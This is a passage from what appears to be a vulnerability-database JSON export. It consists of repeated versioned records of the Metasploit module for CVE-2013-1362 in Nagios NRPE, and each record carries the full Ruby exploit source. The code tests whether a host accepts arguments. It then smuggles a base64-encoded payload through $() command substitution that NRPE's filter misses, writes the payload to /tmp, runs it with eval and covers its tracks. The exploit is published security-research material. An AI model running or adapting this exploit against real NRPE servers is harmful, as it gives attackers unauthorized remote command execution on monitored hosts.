NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-09T13:37:56", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-09T15:39:13", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-09T15:39:13", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-17T23:39:31", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-17T23:39:31", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-18T01:38:05", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-18T01:38:05", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-20T01:37:52", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-20T01:37:52", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
